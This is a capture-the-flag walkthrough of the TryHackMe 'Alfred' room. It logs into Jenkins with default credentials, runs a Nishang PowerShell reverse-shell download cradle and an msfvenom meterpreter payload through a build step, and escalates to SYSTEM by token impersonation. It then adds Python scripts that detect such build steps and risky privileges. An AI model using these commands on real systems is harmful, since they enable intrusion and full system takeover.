The Alfred room on TryHackMe focuses on exploiting Jenkins, a commonly misconfigured automation server that developers use for continuous integration and deployment.
Alfred is a subscription only room.
Initial access
This task requires you to deploy the machine and load up Nishang to gain initial access. Nishang, by nikhil_mitt, is a framework and collection of scripts and payloads that enable the use of PowerShell for offensive security.
Nmap (TCP)
Start by scanning the machine with nmap. This way, we can see what ports are open.
nmap 10.10.160.207
This reveals three open ports: 80, 3389 and 8080.

Get Credentials
Referring back to the nmap scan, there are two HTTP services: one on port 80 and another on port 8080. Let’s check these out.
10.10.160.207:80

10.10.160.207:8080

This task requires us to crack the Jenkins login, on port 8080 specifically.
Jenkins default credentials
A simple Google search reveals the default admin username for Jenkins is “admin”.
After toying around with a few admin:password potentials (first trying some Batman-related passwords, e.g. Bruce, Wayne, Joker, etc.), I stumbled on the password before loading up some brute-force tools.
The password is... you guessed it... admin.
The username:password flag is admin:admin.

Jenkins exploit
Now that we’ve gained access to Jenkins, let’s look for some remote code execution vulnerabilities.
The script first requires us to start a Python web server that the target can download the script from.
The Powershell script we need to download is available at the top of the page.
Start Python server
python3 -m http.server

This serves the directory where the command was run on 0.0.0.0:8000.
It is also reachable on your own machine’s IP address, which you can find with the ip addr command.

So let’s download the PowerShell script (above) into that served directory. Then the Jenkins build can download the PowerShell script from our server and run it on the target machine.

RCE Vulnerability
TryHackMe provides a command for us to run on the host.
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
Of course, replace your-ip and your-port with your own values.
So, at first, I toyed with the Script Console, attempting to exploit some Java scripts to download and run the above PowerShell script. But I gave up on this after figuring out you can run a shell script in the build options for the project.


The script here will run on build.


Wait for it to finish.

Then we need to run a netcat listener on the port we gave. Run the following command.
nc -l -p 1337
Then rebuild the Jenkins project.

And... we’re in!
From here, we need to find the user.txt flag.
User flag
Using some general knowledge, we should cd .. up through the filesystem.

Eventually, we see something that clicks: C:\Users\bruce


And finally, we find the user.txt file, and the flag.
Meterpreter
Task 2 sees us generating an msfvenom payload by running the following command.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe

I’d tried to download and run the msfvenom payload via the previous shell that we’d gotten, but to no avail.
The flag is the size of the msfvenom payload. We can see this by running the ls -la command: it’s 73802 bytes.

Instead, I found success by running it through the same build options we exploited earlier, but with the new payload.
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.8.219:8000/theJoker.exe','theJoker.exe')"
Before going through the build process, we need to launch the Metasploit “listener”: run msfconsole, then use exploit/multi/handler with the same payload we gave msfvenom, windows/meterpreter/reverse_tcp.




Now that we’re listening, we can run the build on Jenkins.

After rebuilding, we see the meterpreter session opens successfully.
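Both the Nishang download cradle and the msfvenom drop above went through a Jenkins build step, so the job definitions themselves are a good place for a defender to look. The following Python script is an added example, not part of the TryHackMe room or of Jenkins; it assumes the standard layout where each job's configuration lives in $JENKINS_HOME/jobs/<job>/config.xml, and the sample job definitions embedded in it are constructed (trimmed to the elements that matter). It flags batch, shell and pipeline steps containing the download-and-execute idioms from the two commands above, and goes slightly beyond them with a few closely related PowerShell patterns.

```python
"""Audit Jenkins job definitions for build steps that fetch and execute remote code.

Added example (not TryHackMe's or Jenkins' own code). It reads the config.xml
files Jenkins keeps under $JENKINS_HOME/jobs/<job>/config.xml and flags
"Execute Windows batch command" / "Execute shell" steps (and pipeline scripts)
that contain PowerShell download-and-run idioms like the ones in the write-up.
"""
import re
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List, Tuple

# (regex, tag). The first four come straight from the commands used in the
# write-up; the rest are closely related idioms worth flagging in a build step.
INDICATORS: List[Tuple[str, str]] = [
    (r"downloadstring", "download-string"),                # in-memory script fetch
    (r"downloadfile", "download-file"),                    # drops a binary to disk
    (r"\biex\b|invoke-expression", "invoke-expression"),   # executes fetched text
    (r"invoke-powershelltcp|-reverse\b", "nishang-reverse-shell"),
    (r"-e(nc|ncodedcommand)?\b\s+[a-z0-9+/=]{20,}", "encoded-command"),
    (r"start-process", "start-process"),
    (r"https?://\d{1,3}(\.\d{1,3}){3}", "raw-ip-url"),     # fetch from a bare IP
]

Finding = Tuple[str, str, str]  # (step type, tag, command excerpt)


def scan_job_config(xml_text: str) -> List[Finding]:
    """Return one finding per (build step, indicator) match, in document order."""
    root = ET.fromstring(xml_text)
    steps: List[Tuple[str, str]] = []
    for elem in root.iter():
        # Freestyle build steps: "Execute Windows batch command" / "Execute shell"
        if elem.tag in ("hudson.tasks.BatchFile", "hudson.tasks.Shell"):
            steps.append((elem.tag, elem.findtext("command") or ""))
    # Pipeline jobs keep their Groovy script under <definition><script>
    script = root.findtext("./definition/script")
    if script:
        steps.append(("pipeline-script", script))

    findings: List[Finding] = []
    for step_type, command in steps:
        for pattern, tag in INDICATORS:
            if re.search(pattern, command, re.IGNORECASE):
                findings.append((step_type, tag, command.strip()[:80]))
    return findings


def scan_jobs_dir(jenkins_home: str) -> Dict[str, List[Finding]]:
    """Scan every job under a Jenkins home directory; keys are job names."""
    results: Dict[str, List[Finding]] = {}
    for cfg in sorted(Path(jenkins_home).glob("jobs/*/config.xml")):
        try:
            findings = scan_job_config(cfg.read_text(encoding="utf-8"))
        except ET.ParseError as exc:
            findings = [("config.xml", "parse-error", str(exc))]
        if findings:
            results[cfg.parent.name] = findings
    return results


# Constructed sample job definitions (trimmed; real files start with an XML
# declaration and carry many more elements). The suspicious one contains the
# two build-step commands used in the write-up.
BENIGN_JOB = """<project>
  <builders>
    <hudson.tasks.BatchFile>
      <command>echo Building %BUILD_NUMBER%
msbuild app.sln /p:Configuration=Release</command>
    </hudson.tasks.BatchFile>
  </builders>
</project>"""

SUSPICIOUS_JOB = """<project>
  <builders>
    <hudson.tasks.BatchFile>
      <command>powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port</command>
    </hudson.tasks.BatchFile>
    <hudson.tasks.BatchFile>
      <command>powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.8.219:8000/theJoker.exe','theJoker.exe')"</command>
    </hudson.tasks.BatchFile>
  </builders>
</project>"""

if __name__ == "__main__":
    for name, xml in (("benign", BENIGN_JOB), ("suspicious", SUSPICIOUS_JOB)):
        print(f"{name}:")
        for step_type, tag, excerpt in scan_job_config(xml):
            print(f"  [{tag}] {step_type}: {excerpt}")
```

Point scan_jobs_dir at a copy of the Jenkins home directory to sweep every job at once. A hit is not automatically malicious (some teams really do download installers in a build step), but a batch step that pulls a script from a bare IP and pipes it into iex, on an instance that still accepts admin:admin, is exactly the trail this room leaves behind.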

Privilege Escalation
Ugh, this was a bit of a nightmare.
So, flip the build options back to the original netcat route we took, and start a listener with nc -l -p 1234.
Once you get a shell, run the PowerShell command given by TryHackMe.

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
Make sure not to cd out of the folder.

Just run Start-Process "theJoker.exe" to launch the msfvenom payload.
Make sure you have the msfconsole exploit/multi/handler running to catch the shell.

From here, we can execute the shell command to drop into a Windows command shell.
Then we can see all privileges with whoami /priv

To escape the shell, just hit Ctrl+C.
Then we can load the incognito module, using load incognito, to exploit two of the enabled privileges.

Let’s see what tokens are available with list_tokens -g.
From here, we see that the BUILTIN\Administrators tokens are available and can be impersonated.

After running the command impersonate_token BUILTIN\\ADMINISTRATORS we get the required output. Note that the double backslash escapes the backslash.

The above confirms we’re impersonating NT AUTHORITY\SYSTEM.
However, even though we’re impersonating a privileged token, our current process might not carry that authority. So let’s grab the PID of the services.exe process and then migrate to that process.
Fire off the command ps | grep services.exe

Then take the PID number (probably different for you) and run the migrate command to “move to” that process, which is owned by the user we’re impersonating.

Now that we’ve escalated privileges, to get the root flag we need to cd C:\Windows\System32\config, then cat root.txt.
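The escalation above only worked because the account running the Jenkins build held privileges that allow token impersonation. The following Python script is an added example, not from the TryHackMe room: it parses whoami /priv output (a constructed sample is embedded) and reports which enabled privileges fall into a well-known high-risk set. That set (SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeDebugPrivilege and a few others) is general Windows knowledge, not something the write-up names, so treat it as the script's own assumption. Running the same check against the account your own build agents use tells you whether a compromised build step would land in the same place.

```python
"""Parse `whoami /priv` output and flag enabled privileges that allow token abuse.

Added example, not from the TryHackMe room. The high-risk list is general
Windows knowledge (SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege are
what token impersonation relies on), not something the write-up enumerates, and
the sample output below is constructed.
"""
import re
from typing import Dict, List

# Privileges that let a process act as another account or read/modify
# protected system resources; a build agent rarely needs any of them.
HIGH_RISK = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege",
    "SeBackupPrivilege",
    "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege",
}

# The "===== ===== =====" rule that whoami prints under the column headers
SEPARATOR = re.compile(r"^=+(\s+=+)+\s*$")


def parse_privileges(output: str) -> Dict[str, str]:
    """Map privilege name -> state ("Enabled"/"Disabled") from `whoami /priv` text.

    Only the table body after the "=====" separator is parsed. The name is the
    first token and the state the last, so the free-text description in the
    middle (which contains single spaces) never confuses the parser.
    """
    privs: Dict[str, str] = {}
    in_table = False
    for line in output.splitlines():
        if SEPARATOR.match(line):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        if len(parts) >= 2 and parts[0].startswith("Se"):
            privs[parts[0]] = parts[-1]
    return privs


def enabled_high_risk(privs: Dict[str, str]) -> List[str]:
    """High-risk privileges that are currently enabled, sorted by name."""
    return sorted(n for n, s in privs.items() if s.lower() == "enabled" and n in HIGH_RISK)


def held_high_risk(privs: Dict[str, str]) -> List[str]:
    """High-risk privileges the token holds at all; a disabled one can be
    re-enabled by the process itself, so it still counts for hardening."""
    return sorted(n for n in privs if n in HIGH_RISK)


# Constructed sample: the kind of table the build-agent shell returns.
SAMPLE_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    privs = parse_privileges(SAMPLE_OUTPUT)
    print(f"{len(privs)} privileges parsed")
    risky = enabled_high_risk(privs)
    print("enabled high-risk:", ", ".join(risky) or "none")
    if risky:
        print("Run the build agent under a dedicated low-privilege account "
              "rather than a service account that holds these.")
```

Feed it the real output captured from an agent (whoami /priv > privs.txt, then parse_privileges(open("privs.txt").read())) and act on held_high_risk as well as enabled_high_risk: a privilege that is merely disabled in the token is still one the process can switch on.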